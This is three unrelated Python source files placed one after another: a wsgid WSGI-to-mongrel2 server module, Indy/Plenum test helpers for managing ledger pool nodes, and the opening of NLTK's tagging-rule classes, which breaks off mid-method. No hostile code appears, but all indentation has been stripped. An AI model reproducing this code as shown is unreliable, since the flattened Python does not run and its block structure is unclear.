__all__ = ['StartResponse', 'StartResponseCalledTwice', 'Plugin', 'run_command', 'validate_input_params', 'Wsgid']
import sys
import logging
import plugnplay
from command import ICommand
import parser
import re
import os
from wsgid import __version__
from wsgid import conf
from wsgid.interfaces.filters import IPreRequestFilter, IPostRequestFilter
from cStringIO import StringIO
import urllib
from message import Message
import zmq
from glob import glob
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime
Plugin = plugnplay.Plugin
log = logging.getLogger('wsgid')
class StartResponse(object):
# __slots__
def __init__(self, message, server):
self.headers = []
self.status = ''
self.called = False
self.headers_sent = False
self.message = message
self.server = server
self.version = message.headers['VERSION'] # this may go away once the environ is built
self._filtered_finish = self._finish
self._filtered_write = self._reply
self.chunked = False
if self.version == 'HTTP/1.1':
self.should_close = (message.headers.get('connection', '').lower() == 'close')
else:
self.should_close = (message.headers.get('connection', '').lower() != 'keep-alive')
server.log.debug("Should close: %s", self.should_close)
def __call__(self, status, response_headers, exec_info=None):
if self.called and not exec_info:
raise StartResponseCalledTwice()
if exec_info and self.headers_sent:
try:
raise exec_info[0], exec_info[1], exec_info[2]
finally:
exec_info = None # Avoid circular reference (PEP-333)
self.headers = response_headers
self.status = status
self.called = True
return self.write
@property
def log(self):
global log
return log
@property
def has_content_length(self):
#content-length generally at the end, so search backwards
return 'content-length' in (header[0].lower() for header in reversed(self.headers))
@property
def supports_chunked(self):
if self.version == 'HTTP/1.1':
return True
if 'te' in self.message.headers:
te = self.message.headers['te']
return ('chunked' in (v.strip().lower() for v in te.split(',')))
return False
def finish(self):
if not self.headers_sent:
self._finalize_headers()
trailer = self._filtered_finish()
if trailer:
self._reply_internal(trailer)
if self.chunked or not self.headers_sent:
self._reply_internal("")
if self.should_close:
self.close()
def close(self):
self.chunked = False
self._reply_internal("")
def write(self, body):
if not self.headers_sent:
self._finalize_headers()
return self._filtered_write(body)
def _finalize_headers(self):
header_set = frozenset(header.lower() for (header, value) in self.headers)
if x_wsgid_header_name not in header_set:
self.headers.append((X_WSGID_HEADER_NAME, __version__))
if 'date' not in header_set:
self.headers.append(("Date", format_date_time(mktime(datetime.now().timetuple()))))
if 'content-length' not in header_set:
if self.supports_chunked:
if 'transfer-encoding' not in header_set:
self.chunked = True
self.headers.append(("Transfer-Encoding", "chunked"))
else:
self.should_close = True
if 'connection' not in header_set:
if self.version == 'HTTP/1.1':
if self.should_close:
self.headers.append(('Connection', 'close'))
else:
if not self.should_close:
self.headers.append(('Connection', 'Keep-Alive'))
else:
#should set should_close to the value of 'connection' in headers
pass
self._run_post_filters(IPostRequestFilter.implementors())
def _finish(self):
return ""
def _reply(self, body):
if body is None:
return None
else:
return self._reply_internal(body)
def _reply_internal(self, body):
"""
Constructs a mongrel2 response message
"""
if self.chunked:
body = "%s\r\n%s\r\n" % (hex(len(body))[2:], body)
if not self.headers_sent:
self.headers_sent = True
return self.server._reply(self.message, self.status, self.headers, body)
return self.server._reply(self.message, None, None, body)
def error(self, status):
if not self.headers_sent:
self(status, [], True)
self.write("")
self.close()
def _run_post_filters(self, filters):
"""
Run post request filters
This method is separated because the post request filter should return a value that will
be passed to the next filter in the execution chain
"""
self.log.debug("Calling PostRequest filters...")
status, headers, write, finish = self.status, self.headers, self._reply, self._finish
for f in filters:
try:
self.log.debug("Calling {0} filter".format(f.__class__.__name__))
status, headers, write, finish = f.process(self.message, status, headers, write, finish)
except Exception as e:
from wsgid.core import log
log.exception(e)
self.status = status
self.headers = headers
self._filtered_write = write
self._filtered_finish = finish
class StartResponseCalledTwice(Exception):
pass
def run_command():
"""
Extract the first command line argument (if it exists)
and tries to find a ICommand implementor for it.
If found, run it. If not does nothing.
"""
command_implementors = ICommand.implementors()
if command_implementors and len(sys.argv) > 1:
cname = sys.argv[1] # get the command name
for command in command_implementors:
if command.name_matches(cname):
# Remove the command name, since it's not defined
# in the parser options
sys.argv.remove(cname)
command.run(parser.parse_options(use_config=False), command_name=cname)
return True
return False
ZMQ_SOCKET_SPEC = re.compile("(?P<proto>inproc|ipc|tcp|pgm|epgm)://(?P<address>.*)$")
TCP_SOCKET_SPEC = re.compile("(?P<adress>.*):(?P<port>[0-9]+)")
def _is_valid_socket(sockspec):
generic_match = ZMQ_SOCKET_SPEC.match(sockspec)
if generic_match:
proto = generic_match.group('proto')
if proto == "tcp":
return TCP_SOCKET_SPEC.match(generic_match.group('address'))
else:
return True
return False
def validate_input_params(app_path=None, recv=None, send=None):
if app_path and not os.path.exists(app_path):
raise Exception("path {0} does not exist.\n".format(app_path))
if not recv or not _is_valid_socket(recv):
raise Exception("Recv socket is mandatory, value received: {0}\n".format(recv))
if not send or not _is_valid_socket(send):
raise Exception("Send socker is mandatory, value received: {0}\n".format(send))
X_WSGID_HEADER_NAME = 'X-Wsgid'
x_wsgid_header_name = X_WSGID_HEADER_NAME.lower()
X_WSGID_HEADER = '{header}: {version}\r\n'.format(header=X_WSGID_HEADER_NAME, version=__version__)
class Wsgid(object):
def __init__(self, app=None, recv=None, send=None):
self.app = app
self.recv = recv
self.send = send
self.ctx = zmq.Context()
self.log = log
def _setup_zmq_endpoints(self):
recv_sock = self.ctx.socket(zmq.PULL)
recv_sock.connect(self.recv)
self.log.debug("Using PULL socket %s" % self.recv)
send_sock = self.ctx.socket(zmq.PUB)
send_sock.connect(self.send)
self.log.debug("Using PUB socket %s" % self.send)
return (send_sock, recv_sock)
def serve(self):
"""
Start serving requests.
"""
self.log.debug("Setting up ZMQ endpoints")
send_sock, recv_sock = self._setup_zmq_endpoints()
self.send_sock = send_sock
self.log.info("All set, ready to serve requests...")
while self._should_serve():
self.log.debug("Serving requests...")
m2message = Message(recv_sock.recv())
self.log.debug("Request arrived... headers={0}".format(m2message.headers))
if m2message.is_disconnect():
self.log.debug("Disconnect message received, id=%s" % m2message.client_id)
continue
if m2message.is_upload_start():
self.log.debug("Starting async upload, file will be at: {0}".format(m2message.async_upload_path))
continue
# Call the app and send the response back to mongrel2
self._call_wsgi_app(m2message)
def _should_serve(self):
"""
This method exists just to me mocked in the tests.
It is simply too unpredictable to mock the True object
"""
return True
def _call_wsgi_app(self, m2message):
start_response = StartResponse(m2message, self)
environ = self._create_wsgi_environ(m2message.headers, m2message.body)
upload_path = conf.settings.mongrel2_chroot or '/'
if m2message.is_upload_done():
self.log.debug("Async upload done, reading from {0}".format(m2message.async_upload_path))
parts = m2message.async_upload_path.split('/')
upload_path = os.path.join(upload_path, *parts)
environ['wsgi.input'] = open(upload_path)
response = None
try:
self.log.debug("Calling PreRequest filters...")
self._run_simple_filters(IPreRequestFilter.implementors(), self._filter_process_callback, m2message, environ)
self.log.debug("Waiting for the WSGI app to return...")
response = self.app(environ, start_response)
self.log.debug("WSGI app finished running... status={0}, headers={1}".format(start_response.status, start_response.headers))
if response is None:
return start_response.finish()
if not start_response.headers_sent and not start_response.has_content_length:
#try to guess content-length. Works if the result from the app is [body]
try:
n = len(response)
except TypeError:
pass
else:
if n == 1:
data = iter(response).next()
start_response.headers.append(('Content-Length', str(len(data))))
start_response.write(data)
return start_response.finish()
for data in response:
start_response.write(data)
return start_response.finish()
except Exception, e:
# Internal Server Error
self._run_simple_filters(IPostRequestFilter.implementors(), self._filter_exception_callback, m2message, e)
start_response.error('500 Internal Server Error')
self.log.exception(e)
finally:
if hasattr(response, 'close'):
response.close()
if m2message.is_upload_done():
self._remove_tmp_file(upload_path)
def _filter_exception_callback(self, f, *args):
f.exception(*args)
def _filter_process_callback(self, f, *args):
return f.process(*args)
def _run_simple_filters(self, filters, callback, m2message, *filter_args):
"""
Run pre request filters
"""
for f in filters:
try:
self.log.debug("Calling {0} filter".format(f.__class__.__name__))
callback(f, m2message, *filter_args)
except Exception as e:
from wsgid.core import log
log.exception(e)
def _remove_tmp_file(self, filepath):
try:
os.unlink(filepath)
except OSError, o:
self.log.exception(o)
def _reply(self, message, status, headers, body):
conn_id = message.client_id
uuid = message.server_id
body_list = [uuid, " ", str(len(conn_id)), ":", conn_id, ", "]
if status:
body_list.append("HTTP/1.1 ")
body_list.append(status)
body_list.append("\r\n")
if headers:
body_list.extend(("%s: %s\r\n" % items for items in headers))
body_list.append("\r\n")
body_list.append(body)
self.log.debug("Returning to mongrel2")
data = "".join(body_list)
self.log.debug("Data: (%d) %s", len(data), data)
try:
self.send_sock.send(data, flags=zmq.NOBLOCK)
except zmq.EAGAIN:
#eat or propogate?
log.warn("Discarding response to {} due to full send queue".format((uuid,)))
return False
return True
def _create_wsgi_environ(self, json_headers, body=None):
"""
Creates a complete WSGI environ from the JSON encoded headers
reveived from mongrel2.
@json_headers should be an already parsed JSON string
"""
environ = {}
#Not needed
json_headers.pop('URI', None)
#First, some fixed values
environ['wsgi.multithread'] = False
environ['wsgi.multiprocess'] = True
environ['wsgi.run_once'] = True
environ['wsgi.errors'] = sys.stderr
environ['wsgi.version'] = (1, 0)
self._set(environ, 'wsgi.url_scheme', json_headers.get('URL_SCHEME', "http"))
if body:
environ['wsgi.input'] = StringIO(body)
else:
environ['wsgi.input'] = StringIO('')
self._set(environ, 'REQUEST_METHOD', json_headers.pop('METHOD'))
self._set(environ, 'SERVER_PROTOCOL', json_headers.pop('VERSION'))
self._set(environ, 'SCRIPT_NAME', json_headers.pop('PATTERN').rstrip('/'))
self._set(environ, 'QUERY_STRING', json_headers.pop('QUERY', ""))
script_name = environ['SCRIPT_NAME']
path_info = json_headers.pop('PATH')[len(script_name):]
self._set(environ, 'PATH_INFO', urllib.unquote(path_info))
server_port = '80'
host_header = json_headers.pop('host')
if ':' in host_header:
server_name, server_port = host_header.split(':')
else:
server_name = host_header
self._set(environ, 'HTTP_HOST', host_header)
self._set(environ, 'SERVER_PORT', server_port)
self._set(environ, 'SERVER_NAME', server_name)
self._set(environ, 'REMOTE_ADDR', json_headers['x-forwarded-for'])
self._set(environ, 'CONTENT_TYPE', json_headers.pop('content-type', ''))
environ['content-type'] = environ['CONTENT_TYPE']
self._set(environ, 'CONTENT_LENGTH', json_headers.pop('content-length', ''))
environ['content-length'] = environ['CONTENT_LENGTH']
#Pass the other headers
for (header, value) in json_headers.iteritems():
header = header.replace('-', '_').upper()
environ['HTTP_%s' % header] = str(value)
return environ
def _set(self, environ, key, value):
"""
Sets a value in the environ object
"""
environ[key] = str(value)
class WsgidApp(object):
REGEX_PIDFILE = re.compile("[0-9]+\.pid")
def __init__(self, fullpath):
self.fullpath = fullpath
def is_valid(self):
return os.path.exists(os.path.join(self.fullpath, 'app')) \
and os.path.exists(os.path.join(self.fullpath, 'logs')) \
and os.path.exists(os.path.join(self.fullpath, 'plugins')) \
and os.path.exists(os.path.join(self.fullpath, 'pid')) \
and os.path.exists(os.path.join(self.fullpath, 'pid/master')) \
and os.path.exists(os.path.join(self.fullpath, 'pid/worker'))
def master_pids(self):
return sorted(self._get_pids(self.fullpath, 'pid/master/'))
def worker_pids(self):
return sorted(self._get_pids(self.fullpath, 'pid/worker/'))
@property
def pluginsdir(self):
return os.path.join(self.fullpath, 'plugins')
def _get_pids(self, base_path, pids_path):
final_path = os.path.join(base_path, pids_path, '*.pid')
pid_files = glob(final_path)
pids = [int(os.path.basename(pid_file).split('.')[0]) for pid_file in pid_files if self._is_pidfile(pid_file)]
return pids
def _is_pidfile(self, filename):
return self.REGEX_PIDFILE.match(os.path.basename(filename))
| |
import json
from indy.did import create_and_store_my_did
from indy.ledger import build_node_request, build_nym_request, \
build_get_txn_request
from indy.pool import refresh_pool_ledger
from plenum.test.node_catchup.helper import waitNodeDataEquality
from stp_core.loop.looper import Looper
from stp_core.types import HA
from typing import Iterable, Union, Callable
from plenum.common.constants import VERKEY, VALIDATOR, STEWARD_STRING
from plenum.common.keygen_utils import initNodeKeysForBothStacks
from plenum.common.signer_simple import SimpleSigner
from plenum.common.util import randomString, hexToFriendly
from plenum.test.helper import sdk_sign_request_objects, \
sdk_send_signed_requests, sdk_json_to_request_object, \
sdk_get_and_check_replies, sdk_sign_request_strings
from plenum.test.node_request.helper import sdk_ensure_pool_functional
from plenum.test.test_node import TestNode, \
ensure_node_disconnected, checkNodesConnected
from stp_core.network.port_dispenser import genHa
from plenum.common.config_helper import PNodeConfigHelper
from stp_core.common.log import getlogger
logger = getlogger()
REFRESH_TRY_COUNT = 4
def new_client_request(role, name, looper, sdk_wallet):
wh, did = sdk_wallet
seed = randomString(32)
(named_did, named_verkey) = looper.loop.run_until_complete(
create_and_store_my_did(wh, json.dumps({'seed': seed})))
nym_request = looper.loop.run_until_complete(
build_nym_request(did, named_did, named_verkey,
name, role))
return sdk_sign_request_strings(looper, sdk_wallet,
[json.loads(nym_request)])[0]
def prepare_new_node_data(tconf, tdir, newNodeName, configClass=PNodeConfigHelper):
sigseed = randomString(32).encode()
(nodeIp, nodePort), (clientIp, clientPort) = genHa(2)
config_helper = configClass(newNodeName, tconf, chroot=tdir)
pubkey, verkey, bls_key, key_proof = initNodeKeysForBothStacks(newNodeName, config_helper.keys_dir,
sigseed, override=True)
return sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort, key_proof
def start_not_added_node(looper,
tdir, tconf, allPluginsPath,
newNodeName):
'''
Creates and starts a new node, but doesn't add it to the Pool
(so, NODE txn is not sent).
'''
sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort, key_proof = \
prepare_new_node_data(tconf, tdir, newNodeName)
new_node = create_and_start_new_node(looper, newNodeName,
tdir, randomString(32).encode(),
(nodeIp, nodePort), (clientIp, clientPort),
tconf, True, allPluginsPath, TestNode)
return sigseed, bls_key, new_node, (nodeIp, nodePort), \
(clientIp, clientPort), key_proof
def add_started_node(looper,
new_node,
node_ha,
client_ha,
txnPoolNodeSet,
sdk_pool_handle,
sdk_wallet_steward,
bls_key,
key_proof):
'''
Adds already created node to the pool,
that is sends NODE txn.
Makes sure that node is actually added and connected to all otehr nodes.
'''
new_steward_wallet_handle = sdk_add_new_nym(looper, sdk_pool_handle,
sdk_wallet_steward,
"Steward" + new_node.name,
role=STEWARD_STRING)
node_name = new_node.name
node_dest = hexToFriendly(new_node.nodestack.verhex)
sdk_send_update_node(looper, new_steward_wallet_handle,
sdk_pool_handle, node_dest, node_name,
node_ha[0], node_ha[1],
client_ha[0], client_ha[1],
services=[VALIDATOR],
bls_key=bls_key,
key_proof=key_proof)
txnPoolNodeSet.append(new_node)
looper.run(checkNodesConnected(txnPoolNodeSet))
sdk_pool_refresh(looper, sdk_pool_handle)
sdk_ensure_pool_functional(looper, txnPoolNodeSet,
sdk_wallet_steward,
sdk_pool_handle)
waitNodeDataEquality(looper, new_node, *txnPoolNodeSet[:-1])
def create_and_start_new_node(
looper,
node_name,
tdir,
sigseed,
node_ha,
client_ha,
tconf,
auto_start,
plugin_path,
nodeClass,
do_post_node_creation: Callable = None,
configClass=PNodeConfigHelper):
node = new_node(node_name=node_name,
tdir=tdir,
node_ha=node_ha,
client_ha=client_ha,
tconf=tconf,
plugin_path=plugin_path,
nodeClass=nodeClass,
configClass=configClass)
if do_post_node_creation:
do_post_node_creation(node)
if auto_start:
looper.add(node)
return node
def new_node(
node_name,
tdir,
node_ha,
client_ha,
tconf,
plugin_path,
nodeClass,
configClass=PNodeConfigHelper):
config_helper = configClass(node_name, tconf, chroot=tdir)
node = nodeClass(node_name,
config_helper=config_helper,
config=tconf,
ha=node_ha, cliha=client_ha,
pluginPaths=plugin_path)
return node
def sdk_add_new_steward_and_node(looper,
sdk_pool_handle,
sdk_wallet_steward,
new_steward_name,
new_node_name,
tdir,
tconf,
allPluginsPath=None,
autoStart=True,
nodeClass=TestNode,
transformNodeOpFunc=None,
do_post_node_creation: Callable = None,
services=[VALIDATOR],
wait_till_added=True):
new_steward_wallet_handle = sdk_add_new_nym(looper,
sdk_pool_handle,
sdk_wallet_steward,
alias=new_steward_name,
role=STEWARD_STRING)
new_node = sdk_add_new_node(
looper,
sdk_pool_handle,
new_steward_wallet_handle,
new_node_name,
tdir,
tconf,
allPluginsPath,
autoStart=autoStart,
nodeClass=nodeClass,
do_post_node_creation=do_post_node_creation,
services=services,
wait_till_added=wait_till_added)
return new_steward_wallet_handle, new_node
def sdk_add_new_nym(looper, sdk_pool_handle, creators_wallet,
alias=None, role=None, seed=None,
dest=None, verkey=None, skipverkey=False, no_wait=False):
seed = seed or randomString(32)
alias = alias or randomString(5)
wh, _ = creators_wallet
# filling nym request and getting steward did
# if role == None, we are adding client
nym_request, new_did = looper.loop.run_until_complete(
prepare_nym_request(creators_wallet, seed,
alias, role, dest, verkey, skipverkey))
# sending request using 'sdk_' functions
request_couple = sdk_sign_and_send_prepared_request(looper, creators_wallet,
sdk_pool_handle, nym_request)
if no_wait:
return request_couple
# waitng for replies
sdk_get_and_check_replies(looper, [request_couple])
return wh, new_did
def sdk_add_new_node(looper,
sdk_pool_handle,
steward_wallet_handle,
new_node_name,
tdir, tconf,
allPluginsPath=None, autoStart=True, nodeClass=TestNode,
do_post_node_creation: Callable = None,
services=[VALIDATOR],
wait_till_added=True):
nodeClass = nodeClass or TestNode
sigseed, verkey, bls_key, nodeIp, nodePort, clientIp, clientPort, key_proof = \
prepare_new_node_data(tconf, tdir, new_node_name)
# filling node request
_, steward_did = steward_wallet_handle
node_request = looper.loop.run_until_complete(
prepare_node_request(steward_did,
new_node_name=new_node_name,
clientIp=clientIp,
clientPort=clientPort,
nodeIp=nodeIp,
nodePort=nodePort,
bls_key=bls_key,
sigseed=sigseed,
services=services,
key_proof=key_proof))
# sending request using 'sdk_' functions
request_couple = sdk_sign_and_send_prepared_request(looper, steward_wallet_handle,
sdk_pool_handle, node_request)
if wait_till_added:
# waiting for replies
sdk_get_and_check_replies(looper, [request_couple])
return create_and_start_new_node(looper, new_node_name, tdir, sigseed,
(nodeIp, nodePort), (clientIp, clientPort),
tconf, autoStart, allPluginsPath,
nodeClass,
do_post_node_creation=do_post_node_creation,
configClass=PNodeConfigHelper)
async def prepare_schema_request(wallet, named_seed, alias, role):
pass
async def prepare_nym_request(wallet, named_seed, alias,
role, dest=None, verkey=None, skipverkey=False):
wh, submitter_did = wallet
(named_did, named_verkey) = \
await create_and_store_my_did(wh, json.dumps({'seed': named_seed}))
named_did = dest or named_did
named_verkey = verkey or named_verkey
named_verkey = None if skipverkey else named_verkey
nym_request = await build_nym_request(submitter_did, named_did, named_verkey,
alias, role)
return nym_request, named_did
async def prepare_node_request(steward_did, new_node_name=None, clientIp=None,
clientPort=None, nodeIp=None, nodePort=None, bls_key=None,
sigseed=None, destination=None, services=[VALIDATOR],
key_proof=None):
use_sigseed = sigseed is not None
use_dest = destination is not None
if use_sigseed == use_dest:
raise AttributeError('You should provide only one of: sigseed or destination')
if use_sigseed:
nodeSigner = SimpleSigner(seed=sigseed)
destination = nodeSigner.identifier
data = {}
if new_node_name is not None:
data['alias'] = new_node_name
if clientIp is not None:
data['client_ip'] = clientIp
if clientPort is not None:
data['client_port'] = clientPort
if nodeIp is not None:
data['node_ip'] = nodeIp
if nodePort is not None:
data['node_port'] = nodePort
if key_proof is not None:
data['blskey_pop'] = key_proof
if bls_key is not None:
data['blskey'] = bls_key
if services is not None:
data['services'] = services
node_request = await build_node_request(steward_did, destination, json.dumps(data))
return node_request
def sdk_sign_and_send_prepared_request(looper, sdk_wallet, sdk_pool_handle, string_req):
signed_reqs = sdk_sign_request_objects(looper, sdk_wallet,
[sdk_json_to_request_object(
json.loads(string_req))])
request_couple = sdk_send_signed_requests(sdk_pool_handle, signed_reqs)[0]
return request_couple
def sdk_send_update_node(looper, sdk_submitter_wallet,
sdk_pool_handle,
destination, alias,
node_ip, node_port,
client_ip, client_port,
services=[VALIDATOR],
bls_key=None,
key_proof=None,
pool_refresh=True):
_, submitter_did = sdk_submitter_wallet
# filling node request
node_request = looper.loop.run_until_complete(
prepare_node_request(submitter_did,
new_node_name=alias,
clientIp=client_ip,
clientPort=client_port,
nodeIp=node_ip,
nodePort=node_port,
bls_key=bls_key,
destination=destination,
services=services,
key_proof=key_proof))
# sending request using 'sdk_' functions
request_couple = sdk_sign_and_send_prepared_request(looper, sdk_submitter_wallet,
sdk_pool_handle, node_request)
# waitng for replies
reply = sdk_get_and_check_replies(looper, [request_couple])[0][1]
if pool_refresh:
sdk_pool_refresh(looper, sdk_pool_handle)
return reply
def sdk_pool_refresh(looper, sdk_pool_handle):
looper.loop.run_until_complete(
refresh_pool_ledger(sdk_pool_handle))
def sdk_build_get_txn_request(looper, steward_did, seq_no):
request = looper.loop.run_until_complete(
build_get_txn_request(steward_did, None, seq_no))
return request
def update_node_data_and_reconnect(looper, txnPoolNodeSet,
steward_wallet,
sdk_pool_handle,
node,
new_node_ip, new_node_port,
new_client_ip, new_client_port,
tdir, tconf):
node_ha = node.nodestack.ha
cli_ha = node.clientstack.ha
node_dest = hexToFriendly(node.nodestack.verhex)
sdk_send_update_node(looper, steward_wallet, sdk_pool_handle,
node_dest, node.name,
new_node_ip, new_node_port,
new_client_ip, new_client_port)
# restart the Node with new HA
node.stop()
looper.removeProdable(name=node.name)
config_helper = PNodeConfigHelper(node.name, tconf, chroot=tdir)
restartedNode = TestNode(node.name,
config_helper=config_helper,
config=tconf,
ha=HA(new_node_ip or node_ha.host,
new_node_port or node_ha.port),
cliha=HA(new_client_ip or cli_ha.host,
new_client_port or cli_ha.port))
looper.add(restartedNode)
# replace node in txnPoolNodeSet
try:
idx = next(i for i, n in enumerate(txnPoolNodeSet)
if n.name == node.name)
except StopIteration:
raise Exception('{} is not the pool'.format(node))
txnPoolNodeSet[idx] = restartedNode
looper.run(checkNodesConnected(txnPoolNodeSet))
sdk_ensure_pool_functional(looper, txnPoolNodeSet,
steward_wallet, sdk_pool_handle)
return restartedNode
def sdk_change_node_keys(looper, node, sdk_wallet_steward, sdk_pool_handle,
verkey):
_, steward_did = sdk_wallet_steward
node_dest = hexToFriendly(node.nodestack.verhex)
node_request = looper.loop.run_until_complete(
prepare_node_request(steward_did,
new_node_name=node.name,
destination=node_dest))
request_json = json.loads(node_request)
request_json['operation'][VERKEY] = verkey
node_request1 = json.dumps(request_json)
request_couple = sdk_sign_and_send_prepared_request(looper, sdk_wallet_steward,
sdk_pool_handle, node_request1)
sdk_get_and_check_replies(looper, [request_couple])
node.nodestack.clearLocalRoleKeep()
node.nodestack.clearRemoteRoleKeeps()
node.nodestack.clearAllDir()
node.clientstack.clearLocalRoleKeep()
node.clientstack.clearRemoteRoleKeeps()
node.clientstack.clearAllDir()
def demote_node(looper, steward_wallet, sdk_pool_handle,
node):
node_nym = hexToFriendly(node.nodestack.verhex)
sdk_send_update_node(looper, steward_wallet,
sdk_pool_handle, node_nym, node.name,
None, None,
None, None,
services=[])
def promote_node(looper, steward_wallet, sdk_pool_handle,
node):
node_nym = hexToFriendly(node.nodestack.verhex)
sdk_send_update_node(looper, steward_wallet,
sdk_pool_handle, node_nym, node.name,
None, None,
None, None,
services=[VALIDATOR])
def disconnectPoolNode(poolNodes: Iterable,
disconnect: Union[str, TestNode],
stopNode=True):
if isinstance(disconnect, TestNode):
disconnect = disconnect.name
assert isinstance(disconnect, str)
for node in poolNodes:
if node.name == disconnect:
if stopNode:
node.stop()
else:
node.clientstack.close()
node.nodestack.close()
break
else:
raise AssertionError('The node {} which should be disconnected '
'is not found in the passed pool node list {}'
.format(disconnect, poolNodes))
def reconnectPoolNode(looper: Looper,
poolNodes: Iterable,
connect: Union[str, TestNode]):
if isinstance(connect, TestNode):
connect = connect.name
assert isinstance(connect, str)
for node in poolNodes:
if node.name == connect:
if node.isGoing():
node.nodestack.open()
node.clientstack.open()
node.nodestack.maintainConnections(force=True)
else:
node.start(looper)
break
else:
raise AssertionError('The node {} which should be reconnected '
'is not found in the passed pool node list {}'
.format(connect, poolNodes))
def disconnect_node_and_ensure_disconnected(looper: Looper,
poolNodes: Iterable[TestNode],
disconnect: Union[str, TestNode],
timeout=None,
stopNode=True):
if isinstance(disconnect, TestNode):
disconnect = disconnect.name
assert isinstance(disconnect, str)
matches = [n for n in poolNodes if n.name == disconnect]
assert len(matches) == 1
node_to_disconnect = matches[0]
disconnectPoolNode(poolNodes, disconnect, stopNode=stopNode)
ensure_node_disconnected(looper,
node_to_disconnect,
set(poolNodes) - {node_to_disconnect},
timeout=timeout)
def reconnect_node_and_ensure_connected(looper: Looper,
poolNodes: Iterable[TestNode],
connect: Union[str, TestNode],
timeout=None):
if isinstance(connect, TestNode):
connect = connect.name
assert isinstance(connect, str)
reconnectPoolNode(looper, poolNodes, connect)
looper.run(checkNodesConnected(poolNodes, customTimeout=timeout))
def sdk_add_2_nodes(looper, txnPoolNodeSet,
sdk_pool_handle, sdk_wallet_steward,
tdir, tconf, allPluginsPath):
names = ("Zeta", "Eta")
new_nodes = []
for node_name in names:
new_steward_name = "testClientSteward" + randomString(3)
new_steward_wallet, new_node = \
sdk_add_new_steward_and_node(looper,
sdk_pool_handle,
sdk_wallet_steward,
new_steward_name,
node_name,
tdir,
tconf,
allPluginsPath)
txnPoolNodeSet.append(new_node)
looper.run(checkNodesConnected(txnPoolNodeSet))
waitNodeDataEquality(looper, new_node, *txnPoolNodeSet[:-1],
exclude_from_check=['check_last_ordered_3pc_backup'])
sdk_pool_refresh(looper, sdk_pool_handle)
new_nodes.append(new_node)
return new_nodes
def sdk_add_new_nym_without_waiting(looper, sdk_pool_handle, creators_wallet,
alias=None, role=None, seed=None,
dest=None, verkey=None, skipverkey=False):
seed = seed or randomString(32)
alias = alias or randomString(5)
wh, _ = creators_wallet
nym_request, new_did = looper.loop.run_until_complete(
prepare_nym_request(creators_wallet, seed,
alias, role, dest, verkey, skipverkey))
sdk_sign_and_send_prepared_request(looper, creators_wallet,
sdk_pool_handle, nym_request)
| |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: Transformation-based learning
#
# Copyright (C) 2001-2017 NLTK Project
# Author: Marcus Uneson <marcus.uneson@gmail.com>
# based on previous (nltk2) version by
# Christopher Maloof, Edward Loper, Steven Bird
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import print_function
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from nltk.compat import python_2_unicode_compatible, unicode_repr
from nltk import jsontags
######################################################################
# Tag Rules
######################################################################
@add_metaclass(ABCMeta)
class TagRule(object):
"""
An interface for tag transformations on a tagged corpus, as
performed by tbl taggers. Each transformation finds all tokens
in the corpus that are tagged with a specific original tag and
satisfy a specific condition, and replaces their tags with a
replacement tag. For any given transformation, the original
tag, replacement tag, and condition are fixed. Conditions may
depend on the token under consideration, as well as any other
tokens in the corpus.
Tag rules must be comparable and hashable.
"""
def __init__(self, original_tag, replacement_tag):
self.original_tag = original_tag
"""The tag which this TagRule may cause to be replaced."""
self.replacement_tag = replacement_tag
"""The tag with which this TagRule may replace another tag."""
def apply(self, tokens, positions=None):
"""
Apply this rule at every position in positions where it
applies to the given sentence. I.e., for each position p
in *positions*, if *tokens[p]* is tagged with this rule's
original tag, and satisfies this rule's condition, then set
its tag to be this rule's replacement tag.
:param tokens: The tagged sentence
:type tokens: list(tuple(str, str))
:type positions: list(int)
:param positions: The positions where the transformation is to
be tried. If not specified, try it at all positions.
:return: The indices of tokens whose tags were changed by this
rule.
:rtype: int
"""
if positions is None:
positions = list(range(len(tokens)))
# Determine the indices at which this rule applies.
change = [i for i in positions if self.applies(tokens, i)]
# Make the changes. Note: this must be done in a separate
# step from finding applicable locations, since we don't want
# the rule to interact with itself.
for i in change:
tokens[i] = (tokens[i][0], self.replacement_tag)
return change
@abstractmethod
def applies(self, tokens, index):
"""
:return: True if the rule would change the tag of
``tokens[index]``, False otherwise
:rtype: bool
:param tokens: A tagged sentence
:type tokens: list(str)
:param index: The index to check
:type index: int
"""
# Rules must be comparable and hashable for the algorithm to work
def __eq__(self, other):
raise TypeError("Rules must implement __eq__()")
def __ne__(self, other):
raise TypeError("Rules must implement __ne__()")
def __hash__(self):
raise TypeError("Rules must implement __hash__()")
@python_2_unicode_compatible
@jsontags.register_tag
class Rule(TagRule):
"""
A Rule checks the current corpus position for a certain set of conditions;
if they are all fulfilled, the Rule is triggered, meaning that it
will change tag A to tag B. For other tags than A, nothing happens.
The conditions are parameters to the Rule instance. Each condition is a feature-value pair,
with a set of positions to check for the value of the corresponding feature.
Conceptually, the positions are joined by logical OR, and the feature set by logical AND.
More formally, the Rule is then applicable to the M{n}th token iff:
- The M{n}th token is tagged with the Rule's original tag; and
- For each (Feature(positions), M{value}) tuple:
- The value of Feature of at least one token in {n+p for p in positions}
is M{value}.
"""
json_tag = 'nltk.tbl.Rule'
def __init__(self, templateid, original_tag, replacement_tag, conditions):
"""
Construct a new Rule that changes a token's tag from
C{original_tag} to C{replacement_tag} if all of the properties
specified in C{conditions} hold.
@type templateid: string
@param templateid: the template id (a zero-padded string, '001' etc,
so it will sort nicely)
@type conditions: C{iterable} of C{Feature}
@param conditions: A list of Feature(positions),
each of which specifies that the property (computed by
Feature.extract_property()) of at least one
token in M{n} + p in positions is C{value}.
"""
TagRule.__init__(self, original_tag, replacement_tag)
self._conditions = conditions
self.templateid = templateid
def encode_json_obj(self):
return {
'templateid': self.templateid,
'original': self.original_tag,
'replacement': self.replacement_tag,
'conditions': self._conditions,
}
@classmethod
def decode_json_obj(cls, obj):
return cls(obj['templateid'], obj['original'], obj['replacement'], obj['conditions'])
def applies(self, tokens, index):
# Inherit docs from TagRule
# Does the given token have this Rule's "original tag"?
if tokens[index][1] != self.original_tag:
return False
# Check to make sure that every condition holds.
for (feature, val) in self._conditions:
# Look for *any* token that satisfies the condition.
for pos in feature.positions:
if not (0 <= index + pos < len(tokens)):
continue
if feature.extract_property(tokens, index+pos) == val:
break
else:
# No token satisfied the condition; return false.
return False
# Every condition checked out, so the Rule is applicable.
return True
def __eq__(self, other):
return (self is other or
(other is not None and
